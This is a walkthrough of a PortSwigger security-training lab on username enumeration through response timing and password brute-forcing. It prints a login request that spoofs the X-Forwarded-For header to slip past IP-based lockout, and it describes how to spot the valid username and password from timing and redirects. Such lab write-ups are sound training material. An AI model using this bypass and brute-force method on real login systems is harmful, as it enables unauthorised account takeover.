This lab is vulnerable to username enumeration using its response times. To solve the lab, enumerate a valid username, brute-force this user's password, then access their account page.

-   Your credentials: `wiener:peter`
-   [Candidate usernames](https://portswigger.net/web-security/authentication/auth-lab-usernames)
-   [Candidate passwords](https://portswigger.net/web-security/authentication/auth-lab-passwords)

# Practical
So let's see what happens if we try to enter a username or password. We get :
```txt
Invalid Username or Password.
```
And if we do that a couple time we get an IP-ban cooldown
```txt
You have entered the password invalid multiple times, please wait 30 minutes.
```
Yikes, let's see the hint if we can bypass it somehow.
```txt
To add to the challenge, the lab also implements a form of IP-based brute-force protection. However, this can be easily bypassed by manipulating HTTP request headers.
```
Searching for **http request headers bypass ip ban**, we get search results of including the header 'X-Forwarded-For: IP'
Let's try that.
```html
POST /login HTTP/1.1
Host: target-ac621f971e18964780c925490038002f.web-security-academy.net
Cookie: session=roeqcSZCfOQAv5VQs9ROL7eLGH3pfzae
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
Origin: https://target-ac621f971e18964780c925490038002f.web-security-academy.net
Dnt: 1
Referer: https://target-ac621f971e18964780c925490038002f.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Gpc: 1
Te: trailers
Connection: close
X-Forwarded-For: 9003

username=test&password=11111111111111111111111111111111111111111111111111111
```
And we're able to bypass it, note that you need to change the values each time after it blocks it.
So let's set up 2 payloads for this, 1 for our numbers, 1 for our usernames.
Since we're doing via response timing, we'll have to evaluate the timing of each response since they're could be lag and other factors. I chose the top 10 requests and I found one that had a response time of 625ms
```html
arizona
```
So we have a username, now let's enumerate for password, note that you need to change the numbers since those are now IP-banned for 30 minutes. Since we know if we're logged in we get a redirect, let's find one with status 302.
```html
michelle
```
Now let's try these credentials and log in.
```html
arizona.michelle
```
And we logged in and solved the lab.